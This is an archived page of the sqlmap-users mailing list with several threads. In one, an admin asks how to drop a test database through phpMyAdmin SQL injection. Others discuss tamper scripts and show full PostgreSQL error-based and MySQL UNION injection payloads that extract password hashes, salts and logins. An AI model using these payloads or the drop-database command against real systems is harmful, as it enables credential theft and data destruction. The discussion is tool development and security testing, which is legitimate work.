sqlmap-users Mailing List for sqlmap
Brought to you by:
inquisb
You can subscribe to this list here.
2008 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
(4) |
Oct
(11) |
Nov
(24) |
Dec
(13) |
---|---|---|---|---|---|---|---|---|---|---|---|---|
2009 |
Jan
(23) |
Feb
(17) |
Mar
(13) |
Apr
(48) |
May
(22) |
Jun
(18) |
Jul
(22) |
Aug
(13) |
Sep
(23) |
Oct
(6) |
Nov
(11) |
Dec
(25) |
2010 |
Jan
(21) |
Feb
(33) |
Mar
(61) |
Apr
(47) |
May
(48) |
Jun
(30) |
Jul
(24) |
Aug
(37) |
Sep
(52) |
Oct
(59) |
Nov
(32) |
Dec
(57) |
2011 |
Jan
(166) |
Feb
(93) |
Mar
(65) |
Apr
(117) |
May
(87) |
Jun
(124) |
Jul
(102) |
Aug
(78) |
Sep
(65) |
Oct
(22) |
Nov
(71) |
Dec
(79) |
2012 |
Jan
(93) |
Feb
(55) |
Mar
(45) |
Apr
(49) |
May
(56) |
Jun
(93) |
Jul
(95) |
Aug
(42) |
Sep
(26) |
Oct
(36) |
Nov
(32) |
Dec
(46) |
2013 |
Jan
(36) |
Feb
(78) |
Mar
(38) |
Apr
(57) |
May
(35) |
Jun
(39) |
Jul
(23) |
Aug
(33) |
Sep
(28) |
Oct
(38) |
Nov
(22) |
Dec
(16) |
2014 |
Jan
(33) |
Feb
(23) |
Mar
(41) |
Apr
(29) |
May
(12) |
Jun
(20) |
Jul
(21) |
Aug
(23) |
Sep
(18) |
Oct
(34) |
Nov
(12) |
Dec
(39) |
2015 |
Jan
(2) |
Feb
(51) |
Mar
(10) |
Apr
(28) |
May
(9) |
Jun
(22) |
Jul
(32) |
Aug
(35) |
Sep
(29) |
Oct
(50) |
Nov
(8) |
Dec
(2) |
2016 |
Jan
(8) |
Feb
(2) |
Mar
(3) |
Apr
(14) |
May
|
Jun
|
Jul
|
Aug
(12) |
Sep
|
Oct
|
Nov
(1) |
Dec
(19) |
2017 |
Jan
|
Feb
(18) |
Mar
|
Apr
(1) |
May
|
Jun
|
Jul
|
Aug
(4) |
Sep
|
Oct
|
Nov
(2) |
Dec
|
2018 |
Jan
|
Feb
|
Mar
(1) |
Apr
(1) |
May
(3) |
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
2019 |
Jan
|
Feb
|
Mar
|
Apr
(3) |
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
From: Turritopsis D. T. En M. <ce...@te...> - 2019-04-17 15:24:13
|
Subject/Topic: How do I determine if versions of phpMyAdmin before 4.8.5 is SQL Injectable using sqlmap? Good evening from Singapore, Our customer (company name is Confidential/not disclosed) reported that their MySQL database has been found missing or was deleted a few times. They are using Ubuntu 16.04 LTS Linux server with Apache2 Web Server, MySQL and PHP (LAMP). We responded to these security incidents by changing the passwords of the regular user, root user, and MySQL database user root. We have also examined /var/log/auth.log and think that the hacker could not have come in through ssh or sftp over ssh. From /var/log/mysql/error.log, we can ascertain that the MySQL database has been deleted at certain timings. We have also found nothing abnormal after examining /var/log/apache2/access.log. Even though we have secured the Ubuntu Linux server by changing passwords, the hacker was still able to delete our customer's MySQL database again and again. I have already proposed to install ModSecurity Open Source Web Application Firewall (WAF) to defend against web application attacks but my boss has told me to put that on hold at the moment. In fact, I have already deployed ModSecurity 2.9.0 on a Ubuntu 16.04 LTS *Testing* server and found that it actively detects and logs Nessus and sqlmap vulnerability scans in blocking mode. Since we did not find any evidence that the hacker had breached our customer's Ubuntu 16.04 LTS production server through ssh or Teamviewer, we suspect that the hacker could have achieved it by SQL injection. I took the initiative of downloading and installing Nessus Professional 8.3.1 Trial version for Windows 64-bit. The vulnerability scan report generated by Nessus Web Application Tests shows that our customer is using a version of phpMyAdmin prior to 4.8.5 which could be vulnerable to SQL injection using the designer feature. Further research shows that I can use sqlmap to determine if phpMyAdmin is SQL injectable. I already have a Testing Ubuntu 16.04 LTS Linux server with a Testing MySQL database and a Testing phpMyAdmin 4.8.4. I have purposely installed phpMyAdmin 4.8.4 because this version was reported to be vulnerable to SQL injection using the designer feature, and our customer is using a vulnerable version, according to CVE-2019-6798 ( https://nvd.nist.gov/vuln/detail/CVE-2019-6798 ). Then I proceeded to download and execute sqlmap on our Ubuntu Linux desktop against our Testing server. No matter how many commands I try, sqlmap always report that phpMyAdmin 4.8.4 is *NOT* SQL injectable. Perhaps I was using the wrong sqlmap commands all the time? The following is one of the many sqlmap commands I have used. $ python sqlmap.py -u "https://www.EXAMPLE.com/phymyadmin/index.php?id=1" --level=1 --dbms=mysql --sql-query="drop database" Replace database by database name. May I know what is the correct sqlmap command that I should use to determine that my Testing phpMyAdmin 4.8.4 is SQL injectable? I would like to know if I can successfully drop/delete the Testing database on our Testing server. If I can successfully drop/delete the Testing MySQL database using sqlmap, I would be able to conclude that the hacker must have carried out SQL injection to drop/delete the customer's database. I have already turned off the Testing ModSecurity Web Application Firewall on our Testing server to allow sqlmap to go through. Please point me to any good tutorial on SQL injection using sqlmap. Maybe I do not understand SQL injection well enough. Our customer is also using a customised in-house inventory management system that relies on PHP application and MySQL database. Would open source Snort Intrusion Detection System (IDS) and Intrusion Prevention System (IPS) be able to detect and block SQL injection as well? Please advise. Thank you very much. -----BEGIN EMAIL SIGNATURE----- The Gospel for all Targeted Individuals (TIs): [The New York Times] Microwave Weapons Are Prime Suspect in Ills of U.S. Embassy Workers Link: https://www.nytimes.com/2018/09/01/science/sonic-attack-cuba-microwave.html ******************************************************************************************** Singaporean Mr. Turritopsis Dohrnii Teo En Ming's Academic Qualifications as at 14 Feb 2019 [1] https://tdtemcerts.wordpress.com/ [2] https://tdtemcerts.blogspot.sg/ [3] https://www.scribd.com/user/270125049/Teo-En-Ming -----END EMAIL SIGNATURE----- |
From: Turritopsis D. T. En M. <ce...@te...> - 2019-04-17 14:23:25
|
Subject/Topic: How do I determine if versions of phpMyAdmin before 4.8.5 is SQL Injectable using sqlmap? Good evening from Singapore, Our customer (company name is Confidential/not disclosed) reported that their MySQL database has been found missing or was deleted a few times. They are using Ubuntu 16.04 LTS Linux server with Apache2 Web Server, MySQL and PHP (LAMP). We responded to these security incidents by changing the passwords of the regular user, root user, and MySQL database user root. We have also examined /var/log/auth.log and think that the hacker could not have come in through ssh or sftp over ssh. From /var/log/mysql/error.log, we can ascertain that the MySQL database has been deleted at certain timings. We have also found nothing abnormal after examining /var/log/apache2/access.log. Even though we have secured the Ubuntu Linux server by changing passwords, the hacker was still able to delete our customer's MySQL database again and again. I have already proposed to install ModSecurity Open Source Web Application Firewall (WAF) to defend against web application attacks but my boss has told me to put that on hold at the moment. In fact, I have already deployed ModSecurity 2.9.0 on a Ubuntu 16.04 LTS *Testing* server and found that it actively detects and logs Nessus and sqlmap vulnerability scans in blocking mode. Since we did not find any evidence that the hacker had breached our customer's Ubuntu 16.04 LTS production server through ssh or Teamviewer, we suspect that the hacker could have achieved it by SQL injection. I took the initiative of downloading and installing Nessus Professional 8.3.1 Trial version for Windows 64-bit. The vulnerability scan report generated by Nessus Web Application Tests shows that our customer is using a version of phpMyAdmin prior to 4.8.5 which could be vulnerable to SQL injection using the designer feature. Further research shows that I can use sqlmap to determine if phpMyAdmin is SQL injectable. I already have a Testing Ubuntu 16.04 LTS Linux server with a Testing MySQL database and a Testing phpMyAdmin 4.8.4. I have purposely installed phpMyAdmin 4.8.4 because this version was reported to be vulnerable to SQL injection using the designer feature, and our customer is using a vulnerable version, according to CVE-2019-6798 ( https://nvd.nist.gov/vuln/detail/CVE-2019-6798 ). Then I proceeded to download and execute sqlmap on our Ubuntu Linux desktop against our Testing server. No matter how many commands I try, sqlmap always report that phpMyAdmin 4.8.4 is *NOT* SQL injectable. Perhaps I was using the wrong sqlmap commands all the time? The following is one of the many sqlmap commands I have used. $ python sqlmap.py -u "https://www.EXAMPLE.com/phymyadmin/index.php?id=1" --level=1 --dbms=mysql --sql-query="drop database" Replace database by database name. May I know what is the correct sqlmap command that I should use to determine that my Testing phpMyAdmin 4.8.4 is SQL injectable? I would like to know if I can successfully drop/delete the Testing database on our Testing server. If I can successfully drop/delete the Testing MySQL database using sqlmap, I would be able to conclude that the hacker must have carried out SQL injection to drop/delete the customer's database. I have already turned off the Testing ModSecurity Web Application Firewall on our Testing server to allow sqlmap to go through. Please point me to any good tutorial on SQL injection using sqlmap. Maybe I do not understand SQL injection well enough. Our customer is also using a customised in-house inventory management system that relies on PHP application and MySQL database. Would open source Snort Intrusion Detection System (IDS) and Intrusion Prevention System (IPS) be able to detect and block SQL injection as well? Please advise. Thank you very much. -----BEGIN EMAIL SIGNATURE----- The Gospel for all Targeted Individuals (TIs): [The New York Times] Microwave Weapons Are Prime Suspect in Ills of U.S. Embassy Workers Link: https://www.nytimes.com/2018/09/01/science/sonic-attack-cuba-microwave.html ******************************************************************************************** Singaporean Mr. Turritopsis Dohrnii Teo En Ming's Academic Qualifications as at 14 Feb 2019 [1] https://tdtemcerts.wordpress.com/ [2] https://tdtemcerts.blogspot.sg/ [3] https://www.scribd.com/user/270125049/Teo-En-Ming -----END EMAIL SIGNATURE----- |
From: Turritopsis D. T. En M. <tdt...@gm...> - 2019-04-17 14:17:41
|
Subject/Topic: How do I determine if versions of phpMyAdmin before 4.8.5 is SQL Injectable using sqlmap? Good evening from Singapore, Our customer (company name is Confidential/not disclosed) reported that their MySQL database has been found missing or was deleted a few times. They are using Ubuntu 16.04 LTS Linux server with Apache2 Web Server, MySQL and PHP (LAMP). We responded to these security incidents by changing the passwords of the regular user, root user, and MySQL database user root. We have also examined /var/log/auth.log and think that the hacker could not have come in through ssh or sftp over ssh. From /var/log/mysql/error.log, we can ascertain that the MySQL database has been deleted at certain timings. We have also found nothing abnormal after examining /var/log/apache2/access.log. Even though we have secured the Ubuntu Linux server by changing passwords, the hacker was still able to delete our customer's MySQL database again and again. I have already proposed to install ModSecurity Open Source Web Application Firewall (WAF) to defend against web application attacks but my boss has told me to put that on hold at the moment. In fact, I have already deployed ModSecurity 2.9.0 on a Ubuntu 16.04 LTS *Testing* server and found that it actively detects and logs Nessus and sqlmap vulnerability scans in blocking mode. Since we did not find any evidence that the hacker had breached our customer's Ubuntu 16.04 LTS production server through ssh or Teamviewer, we suspect that the hacker could have achieved it by SQL injection. I took the initiative of downloading and installing Nessus Professional 8.3.1 Trial version for Windows 64-bit. The vulnerability scan report generated by Nessus Web Application Tests shows that our customer is using a version of phpMyAdmin prior to 4.8.5 which could be vulnerable to SQL injection using the designer feature. Further research shows that I can use sqlmap to determine if phpMyAdmin is SQL injectable. I already have a Testing Ubuntu 16.04 LTS Linux server with a Testing MySQL database and a Testing phpMyAdmin 4.8.4. I have purposely installed phpMyAdmin 4.8.4 because this version was reported to be vulnerable to SQL injection using the designer feature, and our customer is using a vulnerable version, according to CVE-2019-6798 ( https://nvd.nist.gov/vuln/detail/CVE-2019-6798 ). Then I proceeded to download and execute sqlmap on our Ubuntu Linux desktop against our Testing server. No matter how many commands I try, sqlmap always report that phpMyAdmin 4.8.4 is *NOT* SQL injectable. Perhaps I was using the wrong sqlmap commands all the time? The following is one of the many sqlmap commands I have used. $ python sqlmap.py -u "https://www.EXAMPLE.com/phymyadmin/index.php?id=1" --level=1 --dbms=mysql --sql-query="drop database" Replace database by database name. May I know what is the correct sqlmap command that I should use to determine that my Testing phpMyAdmin 4.8.4 is SQL injectable? I would like to know if I can successfully drop/delete the Testing database on our Testing server. If I can successfully drop/delete the Testing MySQL database using sqlmap, I would be able to conclude that the hacker must have carried out SQL injection to drop/delete the customer's database. I have already turned off the Testing ModSecurity Web Application Firewall on our Testing server to allow sqlmap to go through. Please point me to any good tutorial on SQL injection using sqlmap. Maybe I do not understand SQL injection well enough. Our customer is also using a customised in-house inventory management system that relies on PHP application and MySQL database. Would open source Snort Intrusion Detection System (IDS) and Intrusion Prevention System (IPS) be able to detect and block SQL injection as well? Please advise. Thank you very much. -----BEGIN EMAIL SIGNATURE----- The Gospel for all Targeted Individuals (TIs): [The New York Times] Microwave Weapons Are Prime Suspect in Ills of U.S. Embassy Workers Link: https://www.nytimes.com/2018/09/01/science/sonic-attack-cuba-microwave.html ******************************************************************************************** Singaporean Mr. Turritopsis Dohrnii Teo En Ming's Academic Qualifications as at 14 Feb 2019 [1] https://tdtemcerts.wordpress.com/ [2] https://tdtemcerts.blogspot.sg/ [3] https://www.scribd.com/user/270125049/Teo-En-Ming -----END EMAIL SIGNATURE----- |
From: Brandon P. <bpe...@gm...> - 2018-05-30 13:53:37
|
> On May 30, 2018, at 8:49 AM, Miroslav Stampar <mir...@gm...> wrote: > > Hi. > > Just added new tamper script to the HEAD. Please update and try --tamper=0x2char > > p.s. There is no need for unhex (as you'll see by running this new tamper script) Perfect, this works like a charm! Thanks for the quick update. > > Kind regards, > Miroslav Stampar > > On Wed, May 30, 2018 at 12:49 PM, Brandon Perry <bpe...@gm... <mailto:bpe...@gm...>> wrote: > I’ve come across a SQL injection that uppercases the input, so that 0xaaaa becomes 0XAAAA. This isn’t a valid hex value in MySQL since 0X is required to use a lowercase x. I attempted to use a quick —eval argument to change the syntax from 0x to X’’, but the single quotes in the X’' syntax end up being escaped with double slashes so the syntax is still broken (X’’ -> X\\’\\’). > > What are the chances a different encoding using UNHEX and CONCAT be used instead of 0x when using BENCHMARK? > > For instance: > > BENCHMARK(5000000,MD5(0xaaaa)) > > Could be rewritten as: > > BENCHMARK(5000000,MD5(UNHEX(CONCAT(CHAR(65),CHAR(65),CHAR(65),CHAR(65)) > > Perhaps this is attainable with a tamper script and I am missing it? This would prevent the application from breaking the SQL syntax by changing 0x to 0X. > > Any thoughts are appreciated! > > ------------------------------------------------------------------------------ > Check out the vibrant tech community on one of the world's most > engaging tech sites, Slashdot.org! http://sdm.link/slashdot <http://sdm.link/slashdot> > _______________________________________________ > sqlmap-users mailing list > sql...@li... <mailto:sql...@li...> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users <https://lists.sourceforge.net/lists/listinfo/sqlmap-users> > > > > > -- > Miroslav Stampar > http://about.me/stamparm <http://about.me/stamparm> |
From: Miroslav S. <mir...@gm...> - 2018-05-30 13:49:55
|
Hi. Just added new tamper script to the HEAD. Please update and try --tamper=0x2char p.s. There is no need for unhex (as you'll see by running this new tamper script) Kind regards, Miroslav Stampar On Wed, May 30, 2018 at 12:49 PM, Brandon Perry <bpe...@gm...> wrote: > I’ve come across a SQL injection that uppercases the input, so that 0xaaaa > becomes 0XAAAA. This isn’t a valid hex value in MySQL since 0X is required > to use a lowercase x. I attempted to use a quick —eval argument to change > the syntax from 0x to X’’, but the single quotes in the X’' syntax end up > being escaped with double slashes so the syntax is still broken (X’’ -> > X\\’\\’). > > What are the chances a different encoding using UNHEX and CONCAT be used > instead of 0x when using BENCHMARK? > > For instance: > > BENCHMARK(5000000,MD5(0xaaaa)) > > Could be rewritten as: > > BENCHMARK(5000000,MD5(UNHEX(CONCAT(CHAR(65),CHAR(65),CHAR(65),CHAR(65)) > > Perhaps this is attainable with a tamper script and I am missing it? This > would prevent the application from breaking the SQL syntax by changing 0x > to 0X. > > Any thoughts are appreciated! > > ------------------------------------------------------------ > ------------------ > Check out the vibrant tech community on one of the world's most > engaging tech sites, Slashdot.org! http://sdm.link/slashdot > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
From: Brandon P. <bpe...@gm...> - 2018-05-30 10:49:27
|
I’ve come across a SQL injection that uppercases the input, so that 0xaaaa becomes 0XAAAA. This isn’t a valid hex value in MySQL since 0X is required to use a lowercase x. I attempted to use a quick —eval argument to change the syntax from 0x to X’’, but the single quotes in the X’' syntax end up being escaped with double slashes so the syntax is still broken (X’’ -> X\\’\\’). What are the chances a different encoding using UNHEX and CONCAT be used instead of 0x when using BENCHMARK? For instance: BENCHMARK(5000000,MD5(0xaaaa)) Could be rewritten as: BENCHMARK(5000000,MD5(UNHEX(CONCAT(CHAR(65),CHAR(65),CHAR(65),CHAR(65)) Perhaps this is attainable with a tamper script and I am missing it? This would prevent the application from breaking the SQL syntax by changing 0x to 0X. Any thoughts are appreciated! |
From: Miroslav S. <mir...@gm...> - 2018-04-03 10:55:57
|
In lots of cases you'll have some sort of length constraints in either GET or POST body. Putting all those SELECTs into single requests simply won't work (especially in GET cases). One more thing. In case of (e.g.) MsSQL there is no "LIMIT m,n" mechanism. Hence, sqlmap uses something called "pivoting" to dump table content, which requires different queries for different column values. Bye On Thu, Mar 29, 2018 at 1:59 AM, Brandon Perry <bpe...@gm...> wrote: > I’m currently exploiting a recent vulnerability announced in Foreman > versions 1.9+ through 1.16.1. The available techniques are boolean, time, > and error-based. > > Error based is the fastest obviously, but it seems like it could be > faster. Currently, it performs an error-based exfil in a similar way MySQL > error-based injections are done, which is a single value at a time. IIRC, > MySQL errors get truncated so that you generally can’t exfil more than 50 > or so characters at a time, so this strategy makes sense in those cases. > > However, PostgreSQL errors that are bubbled up don’t (seem to) have this > limitation and will return very lengthy error messages. > > Currently, sqlmap will grab a value per column per row per request. That > looks like this. > > widgets[16) AND 8137=CAST((CHR(113)||CHR(107)| > |CHR(120)||CHR(122)||CHR(113))||(SELECT COALESCE(CAST(password_salt AS > CHARACTER(10000)),(CHR(32))) FROM public.users ORDER BY id OFFSET 3 LIMIT > 1)::text||(CHR(113)||CHR(98)||CHR(120)||CHR(113)||CHR(113)) AS NUMERIC)-- > lsuo][col]=1 > > widgets[16) AND 8137=CAST((CHR(113)||CHR(107)| > |CHR(120)||CHR(122)||CHR(113))||(SELECT COALESCE(CAST(password_hash AS > CHARACTER(10000)),(CHR(32))) FROM public.users ORDER BY id OFFSET 3 LIMIT > 1)::text||(CHR(113)||CHR(98)||CHR(120)||CHR(113)||CHR(113)) AS NUMERIC)-- > lsuo][col]=1 > > widgets[16) AND 8137=CAST((CHR(113)||CHR(107)| > |CHR(120)||CHR(122)||CHR(113))||(SELECT COALESCE(CAST(login AS > CHARACTER(10000)),(CHR(32))) FROM public.users ORDER BY id OFFSET 3 LIMIT > 1)::text||(CHR(113)||CHR(98)||CHR(120)||CHR(113)||CHR(113)) AS NUMERIC)-- > lsuo][col]=1 > > > Each of these values take a single request/response. But they could easily > be combined into one with each distinct value being pulled out with a > regular expression. > > widgets[16) AND 8137=CAST((CHR(113)||CHR(107)| > |CHR(120)||CHR(122)||CHR(113))||(SELECT COALESCE(CAST(password_salt AS > CHARACTER(10000)),(CHR(32))) FROM users ORDER BY id OFFSET 3 LIMIT > 1)::text||(CHR(113)||CHR(107)||CHR(120)||CHR(122)||CHR(113))||(SELECT > COALESCE(CAST(password_hash AS CHARACTER(10000)),(CHR(32))) FROM users > ORDER BY id OFFSET 3 LIMIT 1)::text||(CHR(113)||CHR(107)| > |CHR(120)||CHR(122)||CHR(113))||(SELECT COALESCE(CAST(login AS > CHARACTER(10000)),(CHR(32))) FROM users ORDER BY id OFFSET 3 LIMIT > 1)::text||(CHR(113)||CHR(98)||CHR(120)||CHR(113)||CHR(113)) AS NUMERIC)-- > lsuo][col]=1 > > > But there may be a reason sqlmap does this in the former way. Anyway, just > my 2c. > > ------------------------------------------------------------ > ------------------ > Check out the vibrant tech community on one of the world's most > engaging tech sites, Slashdot.org! http://sdm.link/slashdot > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
From: Brandon P. <bpe...@gm...> - 2018-03-28 23:59:42
|
I’m currently exploiting a recent vulnerability announced in Foreman versions 1.9+ through 1.16.1. The available techniques are boolean, time, and error-based. Error based is the fastest obviously, but it seems like it could be faster. Currently, it performs an error-based exfil in a similar way MySQL error-based injections are done, which is a single value at a time. IIRC, MySQL errors get truncated so that you generally can’t exfil more than 50 or so characters at a time, so this strategy makes sense in those cases. However, PostgreSQL errors that are bubbled up don’t (seem to) have this limitation and will return very lengthy error messages. Currently, sqlmap will grab a value per column per row per request. That looks like this. widgets[16) AND 8137=CAST((CHR(113)||CHR(107)||CHR(120)||CHR(122)||CHR(113))||(SELECT COALESCE(CAST(password_salt AS CHARACTER(10000)),(CHR(32))) FROM public.users ORDER BY id OFFSET 3 LIMIT 1)::text||(CHR(113)||CHR(98)||CHR(120)||CHR(113)||CHR(113)) AS NUMERIC)-- lsuo][col]=1 widgets[16) AND 8137=CAST((CHR(113)||CHR(107)||CHR(120)||CHR(122)||CHR(113))||(SELECT COALESCE(CAST(password_hash AS CHARACTER(10000)),(CHR(32))) FROM public.users ORDER BY id OFFSET 3 LIMIT 1)::text||(CHR(113)||CHR(98)||CHR(120)||CHR(113)||CHR(113)) AS NUMERIC)-- lsuo][col]=1 widgets[16) AND 8137=CAST((CHR(113)||CHR(107)||CHR(120)||CHR(122)||CHR(113))||(SELECT COALESCE(CAST(login AS CHARACTER(10000)),(CHR(32))) FROM public.users ORDER BY id OFFSET 3 LIMIT 1)::text||(CHR(113)||CHR(98)||CHR(120)||CHR(113)||CHR(113)) AS NUMERIC)-- lsuo][col]=1 Each of these values take a single request/response. But they could easily be combined into one with each distinct value being pulled out with a regular expression. widgets[16) AND 8137=CAST((CHR(113)||CHR(107)||CHR(120)||CHR(122)||CHR(113))||(SELECT COALESCE(CAST(password_salt AS CHARACTER(10000)),(CHR(32))) FROM users ORDER BY id OFFSET 3 LIMIT 1)::text||(CHR(113)||CHR(107)||CHR(120)||CHR(122)||CHR(113))||(SELECT COALESCE(CAST(password_hash AS CHARACTER(10000)),(CHR(32))) FROM users ORDER BY id OFFSET 3 LIMIT 1)::text||(CHR(113)||CHR(107)||CHR(120)||CHR(122)||CHR(113))||(SELECT COALESCE(CAST(login AS CHARACTER(10000)),(CHR(32))) FROM users ORDER BY id OFFSET 3 LIMIT 1)::text||(CHR(113)||CHR(98)||CHR(120)||CHR(113)||CHR(113)) AS NUMERIC)-- lsuo][col]=1 But there may be a reason sqlmap does this in the former way. Anyway, just my 2c. |
From: Brandon P. <bpe...@gm...> - 2017-11-14 20:51:01
|
Put quotes around your URL . The & is being interpreted by bash and ending your URL early. > On Nov 14, 2017, at 2:21 PM, Oleg V. Melnichuk <ol...@gm...> wrote: > > Hi > > I have several sites under the nginx server with different server_name > in a virtual machine with one IP address. Under this IP in the > /etc/hosts file of the host machine are written server_name, which > correspond to nginx. > Firefox for a specific server_name goes to the corresponding site. > > the sqlmap command on one of the pages of one of the server_name > results in a 404 error: > > u@u:~$ sqlmap -u http://1.bla/index.php?route=product/product&product_id=50 > [1] 4869 > u@u:~$ _ > ___ ___| |_____ ___ ___ {1.0.4.0#dev} > |_ -| . | | | .'| . | > |___|_ |_|_|_|_|__,| _| > |_| |_| http://sqlmap.org > > [!] legal disclaimer: Usage of sqlmap for attacking targets without > prior mutual consent is illegal. It is the end user's responsibility > to obey all applicable local, state and federal laws. Developers > assume no liability and are not responsible for any misuse or damage > caused by this program > > [*] starting at 21:17:07 > > [21:17:09] [INFO] testing connection to the target URL > [21:17:10] [CRITICAL] page not found (404) > it is not recommended to continue in this kind of cases. Do you want > to quit and make sure that everything is set up properly? [Y/n] > > [1]+ Stopped sqlmap -u > http://1.bla/index.php?route=product/product > u@u:~$ > > What are the ideas? > > -- > Regards, Oleg V. Melnichuk > > ------------------------------------------------------------------------------ > Check out the vibrant tech community on one of the world's most > engaging tech sites, Slashdot.org! http://sdm.link/slashdot > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users |
From: Oleg V. M. <ol...@gm...> - 2017-11-14 20:21:19
|
Hi I have several sites under the nginx server with different server_name in a virtual machine with one IP address. Under this IP in the /etc/hosts file of the host machine are written server_name, which correspond to nginx. Firefox for a specific server_name goes to the corresponding site. the sqlmap command on one of the pages of one of the server_name results in a 404 error: u@u:~$ sqlmap -u http://1.bla/index.php?route=product/product&product_id=50 [1] 4869 u@u:~$ _ ___ ___| |_____ ___ ___ {1.0.4.0#dev} |_ -| . | | | .'| . | |___|_ |_|_|_|_|__,| _| |_| |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 21:17:07 [21:17:09] [INFO] testing connection to the target URL [21:17:10] [CRITICAL] page not found (404) it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n] [1]+ Stopped sqlmap -u http://1.bla/index.php?route=product/product u@u:~$ What are the ideas? -- Regards, Oleg V. Melnichuk |
From: Brandon P. <bpe...@gm...> - 2017-08-16 01:41:24
|
> On Aug 15, 2017, at 8:21 PM, Miroslav Stampar <mir...@gm...> wrote: > > Hi. > > sqlmap either does the full dump (FULL UNION case) or one row at a time (PARTIAL UNION case - e.g. single row of result). There is no "let's dump N rows per request" - this is really not possible to do in a simple and generic way as targets tend to cut the results in most exotic ways (e.g. first 1024 characters). Also, concatenation of rows in non-MySQL DBMSes is a challenge at least. Thanks, you’re right. I’m thinking about this purely from a MySQL perspective. Thanks for the insight. > > Bye > > On Wed, Aug 16, 2017 at 12:36 AM, Brandon Perry <bpe...@gm... <mailto:bpe...@gm...>> wrote: > Looking at some later requests, it appears that dumping a row from a table is performed this way (each column is concated together). So it looks like this kind of strategy is just not used consistently when limited to a single row. > > However, it could still chunk multiple rows into a single concat statement (selecting 10 rows per request for instance, instead just one). > > Just thoughts. > > > > On Aug 15, 2017, at 4:04 PM, Brandon Perry <bpe...@gm... <mailto:bpe...@gm...>> wrote: > > > > Currently, it seems that sqlmap will use a payload such as the following is a UNIONable parameter is found that can only return one row in order for data to be exfil’ed. > > > > -16301 UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x71787a7871,IFNULL(CAST(schema_name AS CHAR),0x20),0x716a706271) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL > > > > When enumerating databases in an injection like this, sqlmap will make a single request per db name (note the LIMIT clause). This is a bit inefficient. I understand there may be length limitations to query string parameters, but I’m curious why sqlmap wouldn’t use a more efficient payload, such as the following. > > > > -16301 UNION ALL SELECT NULL,NULL,CONCAT(0x41414141, (SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1), 0x41414141,(SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 3,1), 0x41414141,(SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL > > > > Error-based payloads certainly have length limitations in the data they can get out per request, but is there something preventing sqlmap from implementing a more efficient single-row UNION strategy when exfiltrating data? > > > > Let me know if this doesn’t make sense. > > > ------------------------------------------------------------------------------ > Check out the vibrant tech community on one of the world's most > engaging tech sites, Slashdot.org! http://sdm.link/slashdot <http://sdm.link/slashdot> > _______________________________________________ > sqlmap-users mailing list > sql...@li... <mailto:sql...@li...> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users <https://lists.sourceforge.net/lists/listinfo/sqlmap-users> > > > > > -- > Miroslav Stampar > http://about.me/stamparm <http://about.me/stamparm> |
From: Miroslav S. <mir...@gm...> - 2017-08-16 01:21:10
|
Hi. sqlmap either does the full dump (FULL UNION case) or one row at a time (PARTIAL UNION case - e.g. single row of result). There is no "let's dump N rows per request" - this is really not possible to do in a simple and generic way as targets tend to cut the results in most exotic ways (e.g. first 1024 characters). Also, concatenation of rows in non-MySQL DBMSes is a challenge at least. Bye On Wed, Aug 16, 2017 at 12:36 AM, Brandon Perry <bpe...@gm...> wrote: > Looking at some later requests, it appears that dumping a row from a table > is performed this way (each column is concated together). So it looks like > this kind of strategy is just not used consistently when limited to a > single row. > > However, it could still chunk multiple rows into a single concat statement > (selecting 10 rows per request for instance, instead just one). > > Just thoughts. > > > > On Aug 15, 2017, at 4:04 PM, Brandon Perry <bpe...@gm...> > wrote: > > > > Currently, it seems that sqlmap will use a payload such as the following > is a UNIONable parameter is found that can only return one row in order for > data to be exfil’ed. > > > > -16301 UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x71787a7871,IFNULL(CAST(schema_name > AS CHAR),0x20),0x716a706271) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT > 4,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL > > > > When enumerating databases in an injection like this, sqlmap will make a > single request per db name (note the LIMIT clause). This is a bit > inefficient. I understand there may be length limitations to query string > parameters, but I’m curious why sqlmap wouldn’t use a more efficient > payload, such as the following. > > > > -16301 UNION ALL SELECT NULL,NULL,CONCAT(0x41414141, (SELECT schema_name > FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1), 0x41414141,(SELECT schema_name > FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 3,1), 0x41414141,(SELECT schema_name > FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1)),NULL,NULL,NULL,NULL, > NULL,NULL,NULL,NULL > > > > Error-based payloads certainly have length limitations in the data they > can get out per request, but is there something preventing sqlmap from > implementing a more efficient single-row UNION strategy when exfiltrating > data? > > > > Let me know if this doesn’t make sense. > > > ------------------------------------------------------------ > ------------------ > Check out the vibrant tech community on one of the world's most > engaging tech sites, Slashdot.org! http://sdm.link/slashdot > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
From: Brandon P. <bpe...@gm...> - 2017-08-15 22:36:20
|
